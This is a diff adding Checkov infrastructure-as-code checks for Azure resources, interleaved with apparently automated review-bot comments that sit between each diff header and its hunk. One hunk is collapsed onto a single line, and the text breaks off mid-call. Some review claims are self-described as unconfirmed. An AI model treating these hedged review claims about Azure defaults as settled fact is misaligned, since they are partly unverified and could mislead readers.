+ name = "Ensures that ACR disables anonymous pulling of images"
+ id = "CKV_AZURE_138"
+ supported_resources = ("Microsoft.ContainerRegistry/registries",)
+ categories = (CheckCategories.IAM,)
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+ properties = conf.get("properties", {})
+
+ anonymousPullEnabled = properties.get("anonymousPullEnabled")
+
+ sku = conf.get("sku")
+
+ if (
+ sku is not None
+ and isinstance(sku.get("name"), str)
+ and sku.get("name") in ACRAnonymousPullDisabled.ANONYMOUS_PULL_SKUS
+ and properties
+ and anonymousPullEnabled
+ ):
+ return CheckResult.FAILED
+
+ return CheckResult.PASSED
+
+
+check = ACRAnonymousPullDisabled()
diff --git a/checkov/arm/checks/resource/ACRContainerScanEnabled.py b/checkov/arm/checks/resource/ACRContainerScanEnabled.py
new file mode 100644
index 00000000000..f588818dc4d
--- /dev/null
+++ b/checkov/arm/checks/resource/ACRContainerScanEnabled.py
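Review bot: `anonymousPullEnabled` is tested for truthiness, so if the parser hands through an unresolved ARM expression such as `"[parameters('anonymousPull')]"` or the string `"false"`, the non-empty string counts as enabled and the check fails; `str(anonymousPullEnabled).lower() == "true"` (or `anonymousPullEnabled is True`) avoids that. `sku is not None` followed by `sku.get("name")` raises `AttributeError` when `sku` is not a mapping (e.g. an expression string) — `isinstance(sku, dict)` is the guard meant here. The `and properties` clause is redundant once `anonymousPullEnabled` has been read from it, and `self.evaluated_keys` is never set, so the finding will not point at `properties/anonymousPullEnabled`.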
@@ -0,0 +1,28 @@
+
+from __future__ import annotations
+from typing import Any, Dict
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class ACRContainerScanEnabled(BaseResourceCheck):
+ SKUS = {"Standard", "Premium"} # noqa: CCE003 # a static attribute
+
+ def __init__(self) -> None:
+ name = "Enable vulnerability scanning for container images."
+ id = "CKV_AZURE_163"
+ supported_resources = ("Microsoft.ContainerRegistry/registries",)
+ categories = (CheckCategories.GENERAL_SECURITY,)
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+ sku = conf.get("sku", {})
+ sku_name = sku.get("name")
+
+ if isinstance(sku_name, str) and sku_name in ACRContainerScanEnabled.SKUS:
+ return CheckResult.PASSED
+
+ return CheckResult.FAILED
+
+
+check = ACRContainerScanEnabled()
diff --git a/checkov/arm/checks/resource/ACREnableImageQuarantine.py b/checkov/arm/checks/resource/ACREnableImageQuarantine.py
new file mode 100644
index 00000000000..3b3fe5dca45
--- /dev/null
+++ b/checkov/arm/checks/resource/ACREnableImageQuarantine.py
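Review bot: The check passes solely on the SKU being Standard or Premium, but its name says "Enable vulnerability scanning for container images" — the SKU only makes scanning possible, the scan itself is enabled at the Defender/subscription level and is not visible in the registry resource, so a class docstring stating that this check verifies eligibility (SKU tier) rather than an enabled scan would keep the result from being read as more than it is. `conf.get("sku", {})` followed by `sku.get("name")` raises `AttributeError` if `sku` is a string (an expression); `sku = conf.get("sku")` with an `isinstance(sku, dict)` guard covers it. `Dict[str, Any]` is inconsistent with the `dict[str, Any]` used in the sibling files and unnecessary under `from __future__ import annotations`, and the blank first line before `from __future__` is stray.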
@@ -0,0 +1,21 @@
+from __future__ import annotations
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class ACREnableImageQuarantine(BaseResourceValueCheck):
+ def __init__(self) -> None:
+ name = "Ensure container image quarantine, scan, and mark images verified"
+ id = "CKV_AZURE_166"
+ supported_resources = ("Microsoft.ContainerRegistry/registries",)
+ categories = (CheckCategories.SUPPLY_CHAIN,)
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self) -> str:
+ return "properties/policies/quarantinePolicy/status"
+
+ def get_expected_value(self) -> str:
+ return "enabled"
+
+
+check = ACREnableImageQuarantine()
diff --git a/checkov/arm/checks/resource/ACREnableZoneRedundancy.py b/checkov/arm/checks/resource/ACREnableZoneRedundancy.py
new file mode 100644
index 00000000000..da146a84344
--- /dev/null
+++ b/checkov/arm/checks/resource/ACREnableZoneRedundancy.py
@@ -0,0 +1,31 @@
+from __future__ import annotations
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+from typing import Any
+
+
+class ACREnableZoneRedundancy(BaseResourceCheck):
+
+ def __init__(self) -> None:
+ """
+ Zone redundancy provides resiliency and high availability to
+ a registry or replication resource in a specific region. Supported on Premium.
+ """
+ name = "Ensure Azure Container Registry (ACR) is zone redundant"
+ id = "CKV_AZURE_233"
+ supported_resources = ("Microsoft.ContainerRegistry/registries", "Microsoft.ContainerRegistry/registries/replications",)
+ categories = (CheckCategories.BACKUP_AND_RECOVERY,)
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def scan_resource_conf(self, conf: dict[str, list[Any]]) -> CheckResult:
+ # check registry. default=false
+ properties = conf.get("properties")
+ if properties and isinstance(properties, dict):
+ if properties.get("zoneRedundancy") == "Disabled":
+ return CheckResult.FAILED
+ return CheckResult.PASSED
+
+
+check = ACREnableZoneRedundancy()
diff --git a/checkov/arm/checks/resource/ACRPublicNetworkAccessDisabled.py b/checkov/arm/checks/resource/ACRPublicNetworkAccessDisabled.py
new file mode 100644
index 00000000000..b2b91e9cfce
--- /dev/null
+++ b/checkov/arm/checks/resource/ACRPublicNetworkAccessDisabled.py
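Review bot: The inline comment `# check registry. default=false` says the default is disabled, yet a registry or replication with no `zoneRedundancy` property returns PASSED; if the platform default is Disabled, as the comment itself asserts, the absent-property case is exactly the non-compliant one and only an explicit `"Enabled"` should pass: `return CheckResult.PASSED if isinstance(properties, dict) and properties.get("zoneRedundancy") == "Enabled" else CheckResult.FAILED`. The docstring notes the feature is Premium-only, so a non-Premium registry will always fail once that is fixed; if that is intended, the docstring should say so. `conf: dict[str, list[Any]]` is the wrong shape for a conf whose `properties` is read as a dict (the sibling checks use `dict[str, Any]`), and `from typing import Any` sits below the project imports.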
@@ -0,0 +1,22 @@
+
+from __future__ import annotations
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class ACRPublicNetworkAccessDisabled(BaseResourceValueCheck):
+ def __init__(self) -> None:
+ name = "Ensure ACR set to disable public networking"
+ id = "CKV_AZURE_139"
+ supported_resources = ("Microsoft.ContainerRegistry/registries",)
+ categories = [CheckCategories.NETWORKING]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self) -> str:
+ return "properties/publicNetworkAccess"
+
+ def get_expected_value(self) -> str:
+ return "Disabled"
+
+
+check = ACRPublicNetworkAccessDisabled()
diff --git a/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py b/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py
new file mode 100644
index 00000000000..db1c5036b30
--- /dev/null
+++ b/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py
@@ -0,0 +1,38 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AKSEncryptionAtHostEnabled(BaseResourceValueCheck):
+ def __init__(self) -> None:
+ """
+ With host-based encryption, the data stored on the VM host of
+ your AKS agent nodes' VMs is encrypted at rest and flows encrypted to the Storage service.
+ This means the temp disks are encrypted at rest with platform-managed keys.
+ The cache of OS and data disks is encrypted at rest with either platform-managed keys
+ or customer-managed keys depending on the encryption type set on those disks.
+ """
+ name = "Ensure that the AKS cluster encrypt temp disks, caches, and data flows "
+ name += "between Compute and Storage resources"
+ id = "CKV_AZURE_227"
+ supported_resources = ["Microsoft.ContainerService/managedClusters",
+ "Microsoft.ContainerService/managedClusters/agentPools"]
+ categories = [CheckCategories.KUBERNETES, ]
+ super().__init__(
+ name=name,
+ id=id,
+ categories=categories,
+ supported_resources=supported_resources,
+ missing_block_result=CheckResult.FAILED,
+ )
+
+ def get_inspected_key(self) -> str:
+ if self.entity_type == "Microsoft.ContainerService/managedClusters":
+ return "properties/agentPoolProfiles/[0]/enableEncryptionAtHost"
+ else:
+ return "properties/enableEncryptionAtHost"
+
+ def get_expected_value(self) -> bool:
+ return True
+
+
+check = AKSEncryptionAtHostEnabled()
diff --git a/checkov/arm/checks/resource/AKSEphemeralOSDisks.py b/checkov/arm/checks/resource/AKSEphemeralOSDisks.py
new file mode 100644
index 00000000000..92b87553890
--- /dev/null
+++ b/checkov/arm/checks/resource/AKSEphemeralOSDisks.py
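Review bot: For `Microsoft.ContainerService/managedClusters` the inspected key is `properties/agentPoolProfiles/[0]/enableEncryptionAtHost`, so only the first agent pool is evaluated and a cluster whose second pool leaves encryption at host off still passes; the same first-profile-only pattern is in `AKSEphemeralOSDisks` (`osDiskType`), `AKSMaxPodsMinimum` (`agentPoolProfiles[0]["maxPods"]`) and `AKSPoolTypeIsScaleSet` (`type`) in this commit. Either a `scan_resource_conf` that iterates every entry of `agentPoolProfiles` and fails on the first non-compliant pool, or a docstring stating that only the first profile is checked, is needed for the result to mean what the check name says. The `name = ...` / `name += ...` pair can be one implicit string concatenation.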
@@ -0,0 +1,31 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AKSEphemeralOSDisks(BaseResourceValueCheck):
+ def __init__(self) -> None:
+ """
+ Temporary data can contain sensitive data at some points, by using ephemeral disks,
+ we ensure that data written to OS disk is stored on local VM storage and isn't persisted to Azure Storage
+ Azure automatically replicates data stored in the managed OS disk of a virtual machine to Azure storage
+ to avoid data loss in case the virtual machine needs to be relocated to another host.
+ Generally speaking, containers are not designed to have local state persisted to the managed OS disk,
+ hence this behavior offers limited value to AKS hosted while providing some drawbacks,
+ including slower node provisioning and higher read/write latency.
+ Ephemeral disks allow us also to have faster cluster operations like scale or upgrade
+ due to faster re-imaging and boot times.
+ """
+ name = "Ensure ephemeral disks are used for OS disks"
+ id = "CKV_AZURE_226"
+ supported_resources = ["Microsoft.ContainerService/managedClusters",]
+ categories = [CheckCategories.KUBERNETES,]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self) -> str:
+ return "properties/agentPoolProfiles/[0]/osDiskType"
+
+ def get_expected_value(self) -> str:
+ return "Ephemeral"
+
+
+check = AKSEphemeralOSDisks()
diff --git a/checkov/arm/checks/resource/AKSLocalAdminDisabled.py b/checkov/arm/checks/resource/AKSLocalAdminDisabled.py
new file mode 100644
index 00000000000..2fa7d5c967b
--- /dev/null
+++ b/checkov/arm/checks/resource/AKSLocalAdminDisabled.py
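Review bot: `supported_resources` lists only `Microsoft.ContainerService/managedClusters`, so an agent pool declared as its own `Microsoft.ContainerService/managedClusters/agentPools` resource is never evaluated, whereas `AKSEncryptionAtHostEnabled` in this same commit registers both resource types and picks the key from `self.entity_type`; the same approach (`properties/osDiskType` for the agentPools resource) would close that gap. The long docstring is background prose only; a first line stating what is inspected (`osDiskType` of the first agent pool profile, with a `missing_block_result` of whatever the base default is) would serve a reader better than the rationale alone.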
@@ -0,0 +1,20 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AKSLocalAdminDisabled(BaseResourceValueCheck):
+ def __init__(self) -> None:
+ name = "Ensure AKS local admin account is disabled"
+ id = "CKV_AZURE_141"
+ supported_resources = ("Microsoft.ContainerService/managedClusters",)
+ categories = (CheckCategories.IAM,)
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self) -> str:
+ return "properties/disableLocalAccounts"
+
+ def get_expected_value(self) -> bool:
+ return True
+
+
+check = AKSLocalAdminDisabled()
diff --git a/checkov/arm/checks/resource/AKSMaxPodsMinimum.py b/checkov/arm/checks/resource/AKSMaxPodsMinimum.py
new file mode 100644
index 00000000000..4bf722059a0
--- /dev/null
+++ b/checkov/arm/checks/resource/AKSMaxPodsMinimum.py
@@ -0,0 +1,34 @@
+from __future__ import annotations
+from typing import Any
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_check import BaseResourceCheck
+from typing import Optional
+
+
+class AKSMaxPodsMinimum(BaseResourceCheck):
+ def __init__(self) -> None:
+ name = "Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods."
+ id = "CKV_AZURE_168"
+ supported_resources = ("Microsoft.ContainerService/managedClusters",
+ "Microsoft.ContainerService/managedClusters/agentPools", )
+ categories = (CheckCategories.KUBERNETES,)
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+ max_pods: Optional[int] = 30
+
+ properties = conf.get("properties")
+ if properties and isinstance(properties, dict):
+ max_pods = properties.get("maxPods")
+
+ if "agentPoolProfiles" in properties:
+ if "maxPods" in properties["agentPoolProfiles"][0]:
+ max_pods = properties["agentPoolProfiles"][0]["maxPods"]
+
+ if max_pods is None or max_pods < 50:
+ return CheckResult.FAILED
+
+ return CheckResult.PASSED
+
+
+check = AKSMaxPodsMinimum()
diff --git a/checkov/arm/checks/resource/AKSPoolTypeIsScaleSet.py b/checkov/arm/checks/resource/AKSPoolTypeIsScaleSet.py
new file mode 100644
index 00000000000..c0074c69708
--- /dev/null
+++ b/checkov/arm/checks/resource/AKSPoolTypeIsScaleSet.py
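Review bot: `max_pods: Optional[int] = 30` is dead: whenever `properties` is a dict it is immediately replaced by `properties.get("maxPods")`, which is `None` when the key is absent, so the intended default of 30 never reaches the comparison — either drop the literal or write `properties.get("maxPods", 30)`. `properties["agentPoolProfiles"][0]` assumes a non-empty list of dicts (an empty list raises `IndexError`, an expression string raises `TypeError`), and `max_pods < 50` raises `TypeError` if `maxPods` is itself a string expression; an `isinstance` guard on the list and `isinstance(max_pods, int)` before the comparison keep one odd template from aborting the scan. For the managedClusters resource only profile `[0]` is consulted (see the note on `AKSEncryptionAtHostEnabled`). The second `from typing import Optional` after the project imports duplicates the earlier `typing` import and is unnecessary with `from __future__ import annotations` (`int | None`).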
@@ -0,0 +1,24 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck
+
+
+class AKSPoolTypeIsScaleSet(BaseResourceNegativeValueCheck):
+ def __init__(self) -> None:
+ name = "Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets"
+ id = "CKV_AZURE_169"
+ supported_resources = ("Microsoft.ContainerService/managedClusters",)
+ categories = (CheckCategories.KUBERNETES,)
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+ def get_inspected_key(self) -> str:
+ return "properties/agentPoolProfiles/[0]/type"
+
+ def get_forbidden_values(self) -> list[Any]:
+ return ["AvailabilitySet"]
+
+
+check = AKSPoolTypeIsScaleSet()
diff --git a/checkov/arm/checks/resource/AKSUpgradeChannel.py b/checkov/arm/checks/resource/AKSUpgradeChannel.py
new file mode 100644
index 00000000000..f1991478525
--- /dev/null
+++ b/checkov/arm/checks/resource/AKSUpgradeChannel.py
@@ -0,0 +1,30 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck
+
+
+class AKSUpgradeChannel(BaseResourceNegativeValueCheck):
+ def __init__(self) -> None:
+ name = "Ensure AKS cluster upgrade channel is chosen"
+ id = "CKV_AZURE_171"
+ supported_resources = ("Microsoft.ContainerService/managedClusters",)
+ categories = (CheckCategories.NETWORKING,)
+ super().__init__(
+ name=name,
+ id=id,
+ categories=categories,
+ supported_resources=supported_resources,
+ missing_block_result=CheckResult.FAILED,
+ )
+
+ def get_inspected_key(self) -> str:
+ return "properties/autoUpgradeProfile/upgradeChannel"
+
+ def get_forbidden_values(self) -> Any:
+ return "none"
+
+
+check = AKSUpgradeChannel()
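Review bot: `get_forbidden_values` returns the bare string `"none"` while every other negative-value check in this commit (`ACRAdminAccountDisabled`, `AKSPoolTypeIsScaleSet`, `AppServiceDisallowCORS`) returns a list; if the base class tests membership with `in`, a string turns that into a substring test, and the `-> Any` annotation hides the mismatch — `def get_forbidden_values(self) -> list[Any]: return ["none"]`. `CheckCategories.NETWORKING` is an odd category for an upgrade-channel setting; `KUBERNETES`, as the neighbouring AKS checks use, fits better.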
diff --git a/checkov/arm/checks/resource/APIManagementMinTLS12.py b/checkov/arm/checks/resource/APIManagementMinTLS12.py
new file mode 100644
index 00000000000..9813b7f5c7a
--- /dev/null
+++ b/checkov/arm/checks/resource/APIManagementMinTLS12.py
@@ -0,0 +1,35 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class APIManagementMinTLS12(BaseResourceCheck):
+ def __init__(self) -> None:
+ name = "Ensure API management uses at least TLS 1.2"
+ id = "CKV_AZURE_173"
+ supported_resources = ("Microsoft.ApiManagement/service",)
+ categories = (CheckCategories.ENCRYPTION,)
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+ properties = conf.get("properties")
+ if isinstance(properties, dict) and "customProperties" in properties:
+ customProperties = properties.get("customProperties")
+ if isinstance(customProperties, dict):
+ if customProperties.get("Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Backend.Protocols.Ssl30"):
+ return CheckResult.FAILED
+ if customProperties.get("Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Backend.Protocols.Tls10"):
+ return CheckResult.FAILED
+ if customProperties.get("Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Ssl30"):
+ return CheckResult.FAILED
+ if customProperties.get("Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Tls10"):
+ return CheckResult.FAILED
+ if customProperties.get("Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Tls11"):
+ return CheckResult.FAILED
+ return CheckResult.PASSED
+
+
+check = APIManagementMinTLS12()
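Review bot: The five `if customProperties.get(...)` tests are truthiness checks, but these API Management custom properties are string-valued in ARM templates and a template that explicitly disables a protocol writes `"False"` — a non-empty string, so the check fails exactly the configuration it wants to see (from my reading of the resource schema; confirm with a fixture that sets `...Protocols.Tls10: "False"`). Normalising the value (`value is True or str(value).lower() == "true"`) and looping over a module-level tuple of the five keys fixes the false positive, removes the repetition, and lets the finding name the offending key via `evaluated_keys`. `customProperties` should be `custom_properties` per the module's snake_case convention.
```python
INSECURE_PROTOCOL_PROPERTIES = (
    "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Backend.Protocols.Ssl30",
    "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Backend.Protocols.Tls10",
    "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Ssl30",
    "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Tls10",
    "Microsoft.WindowsAzure.ApiManagement.Gateway.Security.Protocols.Tls11",
)

# … unchanged: class header and __init__ …

    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
        properties = conf.get("properties")
        if isinstance(properties, dict):
            custom_properties = properties.get("customProperties")
            if isinstance(custom_properties, dict):
                for key in INSECURE_PROTOCOL_PROPERTIES:
                    value = custom_properties.get(key)
                    # ARM carries these as the strings "True"/"False"; only an explicit true enables the protocol
                    if value is True or str(value).lower() == "true":
                        self.evaluated_keys = [f"properties/customProperties/{key}"]
                        return CheckResult.FAILED
        return CheckResult.PASSED
```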
diff --git a/checkov/arm/checks/resource/APIManagementPublicAccess.py b/checkov/arm/checks/resource/APIManagementPublicAccess.py
new file mode 100644
index 00000000000..5b961416f3c
--- /dev/null
+++ b/checkov/arm/checks/resource/APIManagementPublicAccess.py
@@ -0,0 +1,22 @@
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class APIManagementPublicAccess(BaseResourceValueCheck):
+ def __init__(self) -> None:
+ name = "Ensure API management public access is disabled"
+ id = "CKV_AZURE_174"
+ supported_resources = ("Microsoft.ApiManagement/service",)
+ categories = (CheckCategories.NETWORKING,)
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self) -> str:
+ return "properties/publicNetworkAccess"
+
+ def get_expected_value(self) -> Any:
+ return "Disabled"
+
+
+check = APIManagementPublicAccess()
diff --git a/checkov/arm/checks/resource/AkSSecretStoreRotation.py b/checkov/arm/checks/resource/AkSSecretStoreRotation.py
new file mode 100644
index 00000000000..4589fd1ee1c
--- /dev/null
+++ b/checkov/arm/checks/resource/AkSSecretStoreRotation.py
@@ -0,0 +1,17 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AkSSecretStoreRotation(BaseResourceValueCheck):
+ def __init__(self) -> None:
+ name = "Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters"
+ id = "CKV_AZURE_172"
+ supported_resources = ("Microsoft.ContainerService/managedClusters",)
+ categories = (CheckCategories.GENERAL_SECURITY,)
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self) -> str:
+ return "properties/addonProfiles/azureKeyvaultSecretsProvider/config/enableSecretRotation"
+
+
+check = AkSSecretStoreRotation()
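Review bot: `AkSSecretStoreRotation` does not override `get_expected_value`, so the base default (presumably `True`) is compared against `properties/addonProfiles/azureKeyvaultSecretsProvider/config/enableSecretRotation`, and AKS add-on `config` entries are string-valued in ARM (`"true"`); unless the ARM base normalises string booleans, a template that enables rotation fails — a fixture with `"enableSecretRotation": "true"` would settle it, and returning `"true"` from `get_expected_value` (or both forms if the base offers an expected-values hook) matches what templates actually contain. The class and file name carry a stray lowercase `k` (`AkS…`) and diverge from the other `AKS*` checks added in this commit. In the `APIManagementPublicAccess` hunk above, `get_expected_value` is annotated `-> Any` for a constant `"Disabled"`; `-> str`, as the sibling checks write it.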
diff --git a/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py b/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py
new file mode 100644
index 00000000000..a8003bb59d8
--- /dev/null
+++ b/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py
@@ -0,0 +1,71 @@ +from __future__ import annotations +from typing import Any +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_check import BaseResourceCheck + +BAD_CIPHERS = { + "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384", + "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256", + "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA", + "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA", + "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384", + "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256", + "TLS_DHE_RSA_WITH_AES_256_CBC_SHA", + "TLS_DHE_RSA_WITH_AES_128_CBC_SHA", + "TLS_RSA_WITH_AES_256_GCM_SHA384", + "TLS_RSA_WITH_AES_128_GCM_SHA256", + "TLS_RSA_WITH_AES_256_CBC_SHA256", + "TLS_RSA_WITH_AES_128_CBC_SHA256", + "TLS_RSA_WITH_AES_256_CBC_SHA", + "TLS_RSA_WITH_AES_128_CBC_SHA", + "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 ", + "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256", + "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA", + "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA", + "TLS_DHE_DSS_WITH_AES_256_CBC_SHA256", + "TLS_DHE_DSS_WITH_AES_128_CBC_SHA256 ", + "TLS_DHE_DSS_WITH_AES_256_CBC_SHA", + "TLS_DHE_DSS_WITH_AES_128_CBC_SHA", + "TLS_RSA_WITH_3DES_EDE_CBC_SHA", + "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA", +} +PROTOCOL_VERSIONS = {"TLSv1_2", "TLSv1_3"} + + +class AppGWDefinesSecureProtocols(BaseResourceCheck): + def __init__(self) -> None: + """ + https://azure.github.io/PSRule.Rules.Azure/en/rules/Azure.AppGw.SSLPolicy/ + """ + name = "Ensure Application Gateway defines secure protocols for in transit communication" + id = "CKV_AZURE_218" + supported_resources = ("Microsoft.Network/applicationGateways",) + categories = (CheckCategories.ENCRYPTION,) + super().__init__(name=name, + id=id, + categories=categories, + supported_resources=supported_resources,) + + def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: + sslPolicy = conf["properties"].get("sslPolicy") + if sslPolicy and isinstance(sslPolicy, dict): + policyType = sslPolicy.get("policyType") + if policyType != "Predefined": + protocolversion 
= sslPolicy.get("minProtocolVersion") + if ( + protocolversion and isinstance(protocolversion, str) + and protocolversion in PROTOCOL_VERSIONS + ): + ciphers = sslPolicy.get("cipherSuites") + if ciphers and isinstance(ciphers, list) and any(cipher in BAD_CIPHERS for cipher in ciphers): + return CheckResult.FAILED + return CheckResult.PASSED + + policyName = sslPolicy.get("policyName") + if policyName == "AppGwSslPolicy20220101S": + return CheckResult.PASSED + return CheckResult.FAILED + return CheckResult.FAILED + + +check = AppGWDefinesSecureProtocols() diff --git a/checkov/arm/checks/resource/AppGatewayWAFACLCVE202144228.py b/checkov/arm/checks/resource/AppGatewayWAFACLCVE202144228.py new file mode 100644 index 00000000000..71e3cc02a56 --- /dev/null +++ b/checkov/arm/checks/resource/AppGatewayWAFACLCVE202144228.py 
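Review bot: Two entries in `BAD_CIPHERS` carry a trailing space — `"TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 "` and `"TLS_DHE_DSS_WITH_AES_128_CBC_SHA256 "` — so those suites never match and a custom policy listing either of them passes; strip the whitespace. `conf["properties"]` raises `KeyError` for a gateway template with no `properties` block while every sibling check uses `conf.get("properties")`; `properties = conf.get("properties")` followed by `sslPolicy = properties.get("sslPolicy") if isinstance(properties, dict) else None` keeps the scan alive. For the predefined branch only `AppGwSslPolicy20220101S` passes; the PSRule page cited in the docstring treats the other TLS-1.2-minimum predefined policies as acceptable too (from memory — confirm), so the name comparison may want to be a set. The local names `sslPolicy`, `policyType`, `protocolversion`, `policyName` mix camelCase and flat lowercase; snake_case matches the rest of the module.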
@@ -0,0 +1,53 @@
+from typing import Dict, Any
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+from checkov.common.util.type_forcers import force_list
+
+
+class AppGatewayWAFACLCVE202144228(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell"
+        id = "CKV_AZURE_135"
+        supported_resources = ("Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies",)
+        categories = (CheckCategories.APPLICATION_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties = conf.get("properties")
+        if not properties:
+            return CheckResult.FAILED
+        self.evaluated_keys = properties.get("managedRules")
+        managed_rules = properties.get("managedRules")
+        if managed_rules:
+            managed_rule_sets = managed_rules.get("managedRuleSets") or []
+            for idx_rule_set, rule_set in enumerate(force_list(managed_rule_sets)):
+                self.evaluated_keys = [
+                    f"managedRules/[0]/managedRuleSets[{idx_rule_set}]/ruleSetType",
+                    f"managedRules/[0]/managedRuleSets[{idx_rule_set}]/ruleSetVersion",
+                ]
+                if (rule_set.get("ruleSetType") == "OWASP" or not rule_set.get("ruleSetType")) and rule_set.get("ruleSetVersion") in ["3.1", "3.2"]:
+                    rule_overrides = rule_set.get("ruleGroupOverrides") or []
+                    for idx_override, rule_override in enumerate(force_list(rule_overrides)):
+                        self.evaluated_keys.extend(
+                            [
+                                f"managedRules/[0]/managedRuleSets[{idx_rule_set}]/ruleGroupOverrides/[{idx_override}]/ruleGroupName",
+                                f"managedRules/[0]/managedRuleSets[{idx_rule_set}]/ruleGroupOverrides/[{idx_override}]/rules",
+                            ]
+                        )
+                        if isinstance(rule_override, dict) and rule_override.get("ruleGroupName") == "REQUEST-944-APPLICATION-ATTACK-JAVA":
+                            disabled_rules = rule_override.get("rules") or []
+                            for 
idx_rule_id, disabled_rule in enumerate(force_list(disabled_rules)):
+                                self.evaluated_keys.extend(
+                                    [
+                                        f"managedRules/[0]/managedRuleSets[{idx_rule_set}]/ruleGroupOverrides/[{idx_override}]/rules/[{idx_rule_id}]/ruleId",
+                                    ]
+                                )
+                                if disabled_rule.get("ruleId") == "944240":
+                                    return CheckResult.FAILED
+
+            return CheckResult.PASSED
+
+        return CheckResult.FAILED
+
+
+check = AppGatewayWAFACLCVE202144228()
diff --git a/checkov/arm/checks/resource/AppServiceDisallowCORS.py b/checkov/arm/checks/resource/AppServiceDisallowCORS.py
new file mode 100644
index 00000000000..1a38ca3b287
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceDisallowCORS.py
@@ -0,0 +1,28 @@
+from typing import Any, List
+
+from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck
+from checkov.common.models.enums import CheckCategories, CheckResult
+
+
+class AppServiceDisallowCORS(BaseResourceNegativeValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that CORS disallows every resource to access app services"
+        id = "CKV_AZURE_57"
+        supported_resources = ("Microsoft.Web/sites",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(
